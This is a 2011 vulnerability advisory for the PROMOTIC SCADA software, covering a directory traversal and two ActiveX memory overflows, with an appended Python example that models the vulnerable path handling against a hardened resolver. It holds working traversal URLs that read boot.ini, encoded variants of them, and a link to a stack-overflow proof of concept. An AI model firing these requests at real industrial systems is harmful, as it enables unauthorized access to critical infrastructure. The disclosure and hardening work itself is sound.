#######################################################################

                             Luigi Auriemma

Application:  Microsys PROMOTIC
              http://www.promotic.eu/en/promotic/scada-pm.htm
Versions:     <= 8.1.4
Platforms:    Windows
Bugs:         A] directory traversal
              B] ActiveX SaveCfg stack overflow
              C] ActiveX AddTrend heap overflow
Exploitation: remote
Date:         13 Oct 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From the vendor's website:
"PROMOTIC is a complex SCADA object software tool for creating
applications that monitor, control and display technological processes
in various industrial areas."

#######################################################################

=======
2) Bugs
=======

----------------------
A] directory traversal
----------------------

Directory traversal through the web directory that exposes the
project's files. The name of this directory is set by the project,
for example "dir" in the AppExamples.pra example or "webdir" in
demo.pra, and so on. Both "../" and "..\" sequences are accepted, so
any file on the server's drive readable by the service can be
retrieved.

---------------------------------
B] ActiveX SaveCfg stack overflow
---------------------------------

Stack overflow via the SaveCfg method of the ActiveX object
02000002-9DFA-4B37-ABE9-1929F4BCDEA2.

---------------------------------
C] ActiveX AddTrend heap overflow
---------------------------------

Heap overflow via the AddTrend method.

Note that the ActiveX object may require the user's confirmation
before it is executed.

#######################################################################

===========
3) The Code
===========

A]
  http://SERVER/webdir/..\..\..\..\..\boot.ini
  http://SERVER/webdir/../../../../../boot.ini

B]
  http://aluigi.org/poc/promotic_1.zip

#######################################################################

======
4) Fix
======

No fix.

#######################################################################
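The traversal in 2) A] and 3) A], worked through as an added example that is not part of this advisory and is not PROMOTIC code. The advisory does not describe the server's internals, so naive_resolve() below is only a model of the vulnerable pattern (URL remainder appended to the web root, Win32 semantics for "/" and "\" and ".."), and safe_resolve() is the check a hardened server would apply. WEB_ROOT and the "/webdir/" mount name are assumptions taken from the PoC URLs; the example is pure string handling and touches no file system.

```python
r"""
Added example, not part of the advisory or of PROMOTIC: a pure-string model of a
Windows web-root path resolver. It shows why the two PoC requests from 3) A]

    /webdir/..\..\..\..\..\boot.ini
    /webdir/../../../../../boot.ini

leave the project directory when a server merely appends the URL remainder to
its web root and lets the Win32 file API interpret the result, and how a
hardened resolver refuses them. WEB_ROOT and MOUNT are assumptions derived
from the advisory's PoC URLs; no file system is touched.
"""
from urllib.parse import unquote

WEB_ROOT = r"C:\Promotic\Project\webdir"   # constructed; real name is project-defined
MOUNT = "/webdir/"                         # assumed mount prefix for the project files


def naive_resolve(url_path: str) -> str:
    """Vulnerable pattern (model): decode, strip the mount prefix, glue the rest
    onto WEB_ROOT. Win32 treats '/' and '\\' alike and honours '..', so the loop
    emulates what CreateFile would do with the concatenated path."""
    rest = unquote(url_path)[len(MOUNT):].replace("/", "\\")
    parts = WEB_ROOT.split("\\")
    for comp in rest.split("\\"):
        if comp == "..":
            if len(parts) > 1:          # cannot climb above the drive root
                parts.pop()
        elif comp not in ("", "."):
            parts.append(comp)
    return "\\".join(parts)


def safe_resolve(url_path: str):
    """Hardened resolver. Returns the backslash path under WEB_ROOT, or None when
    the request must be refused. Checks, in order:
      - one percent-decoding pass; if a second pass changes the string the
        request is double-encoded, refuse
      - embedded NUL, refuse
      - request must start with the mount prefix
      - '\\' is normalised to '/' before '.'/'..' handling, so the backslash
        variant of the PoC cannot bypass a forward-slash-only filter
      - '..' that would pop past the root is refused, not silently clamped
      - components containing ':' (drive letters, alternate data streams) or
        ending in dots/spaces (stripped by Win32 name mangling) are refused
    """
    decoded = unquote(url_path)
    if unquote(decoded) != decoded or "\x00" in decoded:
        return None
    if not decoded.startswith(MOUNT):
        return None
    stack = []
    for comp in decoded[len(MOUNT):].replace("\\", "/").split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not stack:
                return None             # traversal above WEB_ROOT
            stack.pop()
            continue
        if ":" in comp or comp != comp.rstrip(" ."):
            return None
        stack.append(comp)
    return "\\".join([WEB_ROOT] + stack)


if __name__ == "__main__":
    # Constructed requests: the two PoC URLs from the advisory plus variants a
    # tester would try (encoded and double-encoded dots, an ADS suffix) and a
    # legitimate request that uses '..' without leaving the web root.
    requests = [
        "/webdir/..\\..\\..\\..\\..\\boot.ini",
        "/webdir/../../../../../boot.ini",
        "/webdir/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini",
        "/webdir/%252e%252e/boot.ini",
        "/webdir/index.htm::$DATA",
        "/webdir/css/../index.htm",
    ]
    for req in requests:
        print(f"{req:55} naive -> {naive_resolve(req)}")
        print(f"{'':55} safe  -> {safe_resolve(req)}")
```

The point of normalising "\" to "/" before any ".." handling is the first PoC URL: a filter that only looks for "../" passes "..\..\" straight through, and on Windows the file API then treats it as a traversal anyway. Refusing, rather than clamping, an over-deep ".." also turns every such request into a loggable event instead of a quietly served file.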